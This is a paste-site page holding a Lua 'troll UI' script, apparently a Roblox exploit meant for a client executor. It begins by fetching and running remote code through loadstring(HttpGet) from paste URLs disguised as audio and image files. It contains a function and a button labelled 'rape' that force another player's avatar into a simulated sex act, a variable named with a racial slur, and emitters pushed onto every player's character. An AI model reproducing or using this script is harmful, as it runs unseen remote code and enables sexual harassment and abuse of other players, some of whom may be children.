R

trollui test

public
rrixh May 31, 2024 Never 68
Clone
Plaintext test-trollui 479 lines (432 loc) | 14.73 KB
1
--[[
2
3
- spanish note
4
loadstring(game:HttpGet("https://pastecode.dev/raw/wn7mrt10/bylulaslollipop.m4a",true))()
5
6
ui made by : https://v3rmillion.net/member.php?action=profile&uid=1642742
7
]]
8
9
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/uwuware/main/skripts/kustomAlert-rrixhmsgsendnotify", true))(); rrixh("skript by @lulaslollipop🍭 enjoy")
10
11
local lime = loadstring(game:HttpGet("https://pastecode.dev/raw/jluslgwa/lime-bloodballbaxkup.jpg"))();
12
13
--[[ VARS ]]--
14
Lollypop=game;
15
pnigga = Lollypop.Players.LocalPlayer.Character;
16
pchar = Lollypop.Players.LocalPlayer.Character;
17
18
local trollSpread = 25
19
local trumpemitters = {}
20
local trumpEnabled = false
21
22
--[[ SKRIPTS ]]--
23
-- rape --
24
function fWeld(zName, zParent, zPart0, zPart1, zCoco, a, b, c, d, e, f)
25
local funcw = Instance.new("Weld")
26
funcw.Name = zName
27
funcw.Parent = zParent
28
funcw.Part0 = zPart0
29
funcw.Part1 = zPart1
30
if (zCoco == true) then
31
funcw.C0 = CFrame.new(a, b, c) * CFrame.fromEulerAnglesXYZ(d, e, f)
32
else
33
funcw.C1 = CFrame.new(a, b, c) * CFrame.fromEulerAnglesXYZ(d, e, f)
34
end
35
return funcw
36
end
37
function fun(n1, n2)
38
pcall(function()
39
t1 = game.Players[n1].Character.Torso
40
t2 = game.Players[n2].Character.Torso
41
t2.Parent.Humanoid.PlatformStand = true
42
t1["Left Shoulder"]:Remove()
43
ls1 = Instance.new("Weld")
44
ls1.Parent = t1
45
ls1.Part0 = t1
46
ls1.Part1 = t1.Parent["Left Arm"]
47
ls1.C0 = CFrame.new(-1.5,0,0)
48
ls1.Name = "Left Shoulder"
49
t1["Right Shoulder"]:Remove()
50
rs1 = Instance.new("Weld")
51
rs1.Parent = t1
52
rs1.Part0 = t1
53
rs1.Part1 = t1.Parent["Right Arm"]
54
rs1.C0 = CFrame.new(1.5,0,0)
55
rs1.Name = "Right Shoulder"
56
t2["Left Shoulder"]:Remove()
57
ls2 = Instance.new("Weld")
58
ls2.Parent = t2
59
ls2.Part0 = t2
60
ls2.Part1 = t2.Parent["Left Arm"]
61
ls2.C0 = CFrame.new(-1.5,0,0)
62
ls2.Name = "Left Shoulder"
63
t2["Right Shoulder"]:Remove()
64
rs2 = Instance.new("Weld")
65
rs2.Parent = t2
66
rs2.Part0 = t2
67
rs2.Part1 = t2.Parent["Right Arm"]
68
rs2.C0 = CFrame.new(1.5,0,0)
69
rs2.Name = "Right Shoulder"
70
t2["Left Hip"]:Remove()
71
lh2 = Instance.new("Weld")
72
lh2.Parent = t2
73
lh2.Part0 = t2
74
lh2.Part1 = t2.Parent["Left Leg"]
75
lh2.C0 = CFrame.new(-0.5,-2,0)
76
lh2.Name = "Left Hip"
77
t2["Right Hip"]:Remove()
78
rh2 = Instance.new("Weld")
79
rh2.Parent = t2
80
rh2.Part0 = t2
81
rh2.Part1 = t2.Parent["Right Leg"]
82
rh2.C0 = CFrame.new(0.5,-2,0)
83
rh2.Name = "Right Hip"
84
local d = Instance.new("Part")
85
d.TopSurface = 0
86
d.BottomSurface = 0
87
d.BrickColor = BrickColor.new("Medium stone grey")
88
d.Shape = "Ball"
89
d.Parent = t1
90
d.Size = Vector3.new(1,1,1)
91
local dm = Instance.new("SpecialMesh")
92
dm.MeshType = "Sphere"
93
dm.Parent = d
94
dm.Scale = Vector3.new(0.4,0.4,0.4)
95
fWeld("weld",t1,t1,d,true,-0.2,-1.3,-0.6,0,0,0)
96
d2 = d:Clone()
97
d2.Parent = t1
98
fWeld("weld",t1,t1,d2,true,0.2,-1.3,-0.6,0,0,0)
99
local c = Instance.new("Part")
100
c.TopSurface = 0
101
c.BottomSurface = 0
102
c.CanCollide = false
103
c.BrickColor = BrickColor.new("Pastel brown")
104
c.Parent = t1
105
c.formFactor = "Custom"
106
c.Size = Vector3.new(0.4,1.3,0.4)
107
cm = Instance.new("CylinderMesh")
108
cm.Parent = c
109
a = fWeld("weld",t1,t1,c,true,0,-1,-0.52+(-c.Size.y/2),math.rad(-80),0,0)
110
c2 = d:Clone()
111
c2.BrickColor = BrickColor.new("Medium stone grey")
112
c2.Mesh.Scale = Vector3.new(0.4,0.62,0.4)
113
c2.Parent = t1
114
fWeld("weld",c,c,c2,true,0,0+(c.Size.y/2),0,math.rad(-10),0,0)
115
local bl = Instance.new("Part")
116
bl.TopSurface = 0
117
bl.BottomSurface = 0
118
bl.CanCollide = false
119
bl.BrickColor = BrickColor.new("Pastel brown")
120
bl.Shape = "Ball"
121
bl.Parent = t2
122
bl.Size = Vector3.new(1,1,1)
123
local dm = Instance.new("SpecialMesh")
124
dm.MeshType = "Sphere"
125
dm.Parent = bl
126
dm.Scale = Vector3.new(1.2,1.2,1.2)
127
fWeld("weld",t2,t2,bl,true,-0.5,0.5,-0.6,0,0,0)
128
local br = Instance.new("Part")
129
br.TopSurface = 0
130
br.BottomSurface = 0
131
br.CanCollide = false
132
br.BrickColor = BrickColor.new("Pastel brown")
133
br.Shape = "Ball"
134
br.Parent = t2
135
br.Size = Vector3.new(1,1,1)
136
local dm = Instance.new("SpecialMesh")
137
dm.MeshType = "Sphere"
138
dm.Parent = br
139
dm.Scale = Vector3.new(1.2,1.2,1.2)
140
fWeld("weld",t2,t2,br,true,0.5,0.5,-0.6,0,0,0)
141
local bln = Instance.new("Part")
142
bln.TopSurface = 0
143
bln.BottomSurface = 0
144
bln.CanCollide = false
145
bln.Shape = "Ball"
146
bln.Parent = t2
147
bln.Size = Vector3.new(1,1,1)
148
local dm = Instance.new("SpecialMesh")
149
dm.MeshType = "Sphere"
150
dm.Parent = bln
151
dm.Scale = Vector3.new(0.2,0.2,0.2)
152
fWeld("weld",t2,t2,bln,true,-0.5,0.5,-1.2,0,0,0)
153
local brn = Instance.new("Part")
154
brn.TopSurface = 0
155
brn.BottomSurface = 0
156
brn.CanCollide = false
157
brn.Shape = "Ball"
158
brn.Parent = t2
159
brn.Size = Vector3.new(1,1,1)
160
local dm = Instance.new("SpecialMesh")
161
dm.MeshType = "Sphere"
162
dm.Parent = brn
163
dm.Scale = Vector3.new(0.2,0.2,0.2)
164
fWeld("weld",t2,t2,brn,true,0.5,0.5,-1.2,0,0,0)
165
lh2.C1 = CFrame.new(0,-1.5,-0.5) * CFrame.Angles(0.9,-0.4,0)
166
rh2.C1 = CFrame.new(0,-1.5,-0.5) * CFrame.Angles(0.9,0.4,0)
167
ls2.C1 = CFrame.new(-0.5,-1.3,-0.5) * CFrame.Angles(0.9,-0.4,0)
168
rs2.C1 = CFrame.new(0.5,-1.3,-0.5) * CFrame.Angles(0.9,0.4,0)
169
ls1.C1 = CFrame.new(-0.5,0.7,0) * CFrame.Angles(-0.9,-0.4,0)
170
rs1.C1 = CFrame.new(0.5,0.7,0) * CFrame.Angles(-0.9,0.4,0)
171
if t1:findFirstChild("weldx") ~= nil then
172
t1.weldx:Remove()
173
end
174
we = fWeld("weldx", t1, t1, t2, true, 0, -0.9, -1.3, math.rad(-90), 0, 0)
175
n = t2.Neck
176
n.C0 = CFrame.new(0, 1.5, 0) * CFrame.Angles(math.rad(-210), math.rad(180), 0)
177
end)
178
coroutine.resume(coroutine.create(function()
179
while wait() do
180
for i = 1,6 do
181
we.C1 = we.C1 * CFrame.new(0,-0.3,0)
182
wait()
183
end
184
185
for i = 1,6 do
186
we.C1 = we.C1 * CFrame.new(0,0.3,0)
187
wait()
188
end
189
end
190
end))
191
end;
192
local lulaslollipop="lulaslollipop";
193
local otherplr = "BHN5CP6VGTWV"
194
195
196
197
198
--[[ BUTTONS ]]--
199
200
local m = lime:Window("🍭 troll ui 🤪");
201
local p = lime:Window("partikles");
202
local s = lime:Window("settings");
203
204
-- [[ MORPH ]] --
205
m:Button("Sonik", function()
206
--sonik
207
local sonik = Lollypop.Players.LocalPlayer.Character
208
local morph = Instance.new("SpecialMesh", pnigga.Torso)
209
morph.MeshType = "FileMesh"
210
morph.MeshId = "http://www.roblox.com/asset/?id=430069460"
211
morph.TextureId = "http://www.roblox.com/asset/?id=430069464"
212
morph.Scale = Vector3.new(0.08, 0.08, 0.08)
213
sonik.Head.Transparency = 1
214
sonik["Left Arm"].Transparency = 1
215
sonik["Right Arm"].Transparency = 1
216
sonik["Left Leg"].Transparency = 1
217
sonik["Right Leg"].Transparency = 1;
218
end)
219
220
m:Button("Bowser", function()
221
--bowser
222
local pchar = game.Players.LocalPlayer.Character
223
local morph = Instance.new("SpecialMesh", pchar.Torso)
224
morph.MeshType = "FileMesh"
225
morph.MeshId = "http://www.roblox.com/asset/?id=430331583"
226
morph.TextureId = "http://www.roblox.com/asset/?id=430331587"
227
morph.Scale = Vector3.new(1, 1, 1)
228
pchar.Head.Transparency = 1
229
pchar["Left Arm"].Transparency = 1
230
pchar["Right Arm"].Transparency = 1
231
pchar["Left Leg"].Transparency = 1
232
pchar["Right Leg"].Transparency = 1;
233
end)
234
235
m:Button("Duxk", function()
236
--be a duxk
237
local pchar = game.Players.LocalPlayer.Character
238
local duck = Instance.new("SpecialMesh", pchar.Torso)
239
duck.MeshType = "FileMesh"
240
duck.MeshId = "http://www.roblox.com/asset/?id=9419831"
241
duck.TextureId = "http://www.roblox.com/asset/?id=9419827"
242
duck.Scale = Vector3.new(5, 5, 5)
243
pchar.Head.Transparency = 1
244
pchar["Left Arm"].Transparency = 1
245
pchar["Right Arm"].Transparency = 1
246
pchar["Left Leg"].Transparency = 1
247
pchar["Right Leg"].Transparency = 1;
248
end)
249
250
m:Button("Dragon", function()
251
--dragon morph
252
local pchar = game.Players.LocalPlayer.Character
253
local dragon = Instance.new("SpecialMesh", pchar.Torso)
254
dragon.MeshType = "FileMesh"
255
dragon.MeshId = "http://www.roblox.com/asset/?id=31516811"
256
dragon.TextureId = "http://www.roblox.com/asset/?id=77991526"
257
dragon.Scale = Vector3.new(5, 5, 5)
258
pchar.Head.Transparency = 1
259
pchar["Left Arm"].Transparency = 1
260
pchar["Right Arm"].Transparency = 1
261
pchar["Left Leg"].Transparency = 1
262
pchar["Right Leg"].Transparency = 1
263
end)
264
265
m:Button("Be Kake", function()
266
--be a kake
267
local pchar = game.Players.LocalPlayer.Character
268
local morph = Instance.new("SpecialMesh", pchar.Torso)
269
morph.MeshType = "FileMesh"
270
morph.MeshId = "http://www.roblox.com/asset/?id=1376455"
271
morph.TextureId = "http://www.roblox.com/asset/?id=1376454"
272
morph.Scale = Vector3.new(5, 5, 5)
273
pchar.Head.Transparency = 1
274
pchar["Left Arm"].Transparency = 1
275
pchar["Right Arm"].Transparency = 1
276
pchar["Left Leg"].Transparency = 1
277
pchar["Right Leg"].Transparency = 1;
278
end)
279
280
m:Button("Be Dat Boi", function()
281
local char = game.Players.LocalPlayer.Character
282
283
for i,v in pairs(char.Torso:GetChildren()) do
284
if v.ClassName == 'Decal' then
285
v:Destroy()
286
end
287
end
288
for i,v in pairs(char:GetChildren()) do
289
if v.ClassName == 'Hat' then
290
v:Destroy()
291
end
292
end
293
for i,v in pairs(char.Head:GetChildren()) do
294
if v.ClassName == 'Decal' then
295
v:Destroy()
296
end
297
end
298
299
local datboi = Instance.new('SpecialMesh', char.Torso)
300
datboi.MeshType = 'FileMesh'
301
datboi.MeshId = 'http://www.roblox.com/asset/?id=430095888'
302
datboi.TextureId = 'http://www.roblox.com/asset/?id=171886325'
303
datboi.Scale = Vector3.new(0.01, 0.01, 0.01)
304
char.Head.Transparency = 1
305
char['Left Arm'].Transparency = 1
306
char['Right Arm'].Transparency = 1
307
char['Left Leg'].Transparency = 1
308
char['Right Leg'].Transparency = 1
309
end);
310
311
m:Button("Be Dat Kermit Boi", function()
312
313
local pchar = game.Players.LocalPlayer.Character
314
local morph = Instance.new("SpecialMesh", pchar.Torso)
315
morph.MeshType = "FileMesh"
316
morph.MeshId = "http://www.roblox.com/asset/?id=516819717"
317
morph.TextureId = "http://www.roblox.com/asset/?id=516819728"
318
morph.Scale = Vector3.new(5, 5, 5)
319
pchar.Head.Transparency = 1
320
pchar["Left Arm"].Transparency = 1
321
pchar["Right Arm"].Transparency = 1
322
pchar["Left Leg"].Transparency = 1
323
pchar["Right Leg"].Transparency = 1
324
end);
325
326
m:Button("rape", function()
327
fun(lulaslollipop, otherplr);
328
end)
329
--thx
330
m:Button("lulaslollipop🍭", function()
331
print("@lulaslollipop on Roblox / @rrixh on diskord // @siipped on telegram")
332
333
end)
334
335
336
-- [[ PARTIKLES ]] --
337
338
p:Button("trump", function()
339
--trump partikles
340
--spawns inf trump faxes
341
--build a wall
342
local playerLeaderstats = {};
343
for i, v in pairs(game.Players:GetChildren()) do
344
table.insert(playerLeaderstats, v)
345
end
346
for i, v in pairs(playerLeaderstats) do
347
local pe = Instance.new("ParticleEmitter",v.Character.Torso)
348
pe.Texture = "http://www.roblox.com/asset/?id=408774805"
349
pe.VelocitySpread = 50
350
local se = Instance.new("ParticleEmitter",v.Character.Torso)
351
se.Texture = "http://www.roblox.com/asset/?id=378919754"
352
se.VelocitySpread = 50;
353
local fe = Instance.new("ParticleEmitter",v.Character.Torso)
354
fe.Texture = "http://www.roblox.com/asset/?id=409990921"
355
fe.VelocitySpread = 50
356
end
357
end)
358
359
p:Button("mlg (snaxk brands)", function()
360
--MLG partikles
361
for i, v in pairs(game.Players:GetChildren()) do
362
local emit = Instance.new("ParticleEmitter")
363
emit.Parent = v.Character.Torso
364
emit.Texture = "http://www.roblox.com/asset/?id=8979672"
365
emit.VelocitySpread = 20
366
end
367
for i, v in pairs(game.Players:GetChildren()) do
368
local emit = Instance.new("ParticleEmitter")
369
emit.Parent = v.Character.Torso
370
emit.Texture = "http://www.roblox.com/asset/?id=176067516"
371
emit.VelocitySpread = 20
372
end
373
for i, v in pairs(game.Players:GetChildren()) do
374
local emit = Instance.new("ParticleEmitter")
375
emit.Parent = v.Character.Torso
376
emit.Texture = "http://www.roblox.com/asset/?id=179012130"
377
emit.VelocitySpread = 20
378
end;
379
end)
380
381
p:Button("illuminati", function()
382
--illuminati partikles
383
local t1 = "http://www.roblox.com/asset/?id=223238256"
384
local t2 = "http://www.roblox.com/asset/?id=201788175"
385
local t3 = "http://www.roblox.com/asset/?id=261113277"
386
387
local xoxo = game.Players:GetChildren()
388
local w = game.Workspace:GetChildren()
389
390
for i,v in pairs(xoxo) do
391
local pe = Instance.new("ParticleEmitter", v.Character.Torso)
392
pe.Texture = t3
393
pe.VelocitySpread = 100
394
end
395
396
for i= 1,#w do
397
if w[i]:isA("BasePart") then
398
local pe = Instance.new("ParticleEmitter", w[i])
399
pe.Texture = t3
400
pe.VelocitySpread = 5
401
end
402
end;
403
end)
404
405
p:Button("anonymous", function()
406
--anonymous partikles
407
local pe = Instance.new("ParticleEmitter",game.Players.LocalPlayer.Character.Torso)
408
pe.Texture = "http://www.roblox.com/asset/?id=127476787"
409
pe.VelocitySpread = 5;
410
end)
411
412
p:Button("troll", function()
413
--troll partikles
414
local t = "rbxassetid://45120559"
415
local p = game.Players:GetPlayers()
416
local w = game.Workspace:GetChildren()
417
for i,v in pairs(p) do
418
local pe = Instance.new("ParticleEmitter", v.Character.Torso)
419
pe.Texture = t
420
pe.VelocitySpread = 100
421
end;
422
for i= 1,#w do
423
if w[i]:isA("BasePart") then
424
local pe = Instance.new("ParticleEmitter", w[i])
425
pe.Texture = t
426
pe.VelocitySpread = 5
427
end;
428
end;
429
end);
430
431
432
-- [ ⚙️SETTINGS⚙️ ] --
433
local rj = "Rejoin";
434
435
s:Button(rj, function()
436
--rejoin lobby
437
local ts = game:GetService("TeleportService")
438
439
local p = game:GetService("Players").LocalPlayer
440
441
ts:TeleportToPlaceInstance(game.PlaceId, game.JobId, p)
442
end)
443
444
local ServerHop = "ServerHop"
445
s:Button(ServerHop, function()
446
local Player = game.Players.LocalPlayer
447
local Http = game:GetService("HttpService")
448
local TPS = game:GetService("TeleportService")
449
local Api = "https://games.roblox.com/v1/games/"
450
451
local _place,_id = game.PlaceId, game.JobId
452
local _servers = Api.._place.."/servers/Public?sortOrder=Desc&limit=100"
453
function ListServers(cursor)
454
local Raw = game:HttpGet(_servers .. ((cursor and "&cursor="..cursor) or ""))
455
return Http:JSONDecode(Raw)
456
end
457
458
local Next; repeat
459
local Servers = ListServers(Next)
460
for i,v in next, Servers.data do
461
if v.playing < v.maxPlayers and v.id ~= _id then
462
local s,r = pcall(TPS.TeleportToPlaceInstance,TPS,_place,v.id,Player)
463
if s then break end
464
end
465
end
466
467
Next = Servers.nextPageCursor
468
until not Next
469
end)
470
471
local Respawn = "Respawn";
472
473
s:Button(Respawn, function()
474
game.Players.LocalPlayer.Character.Humanoid.Health = 0
475
end)
476
477
-- wait()
478
-- ---thx
479
-- print("@lulaslollipop on Roblox / @rrixh on diskord // @siipped on telegram")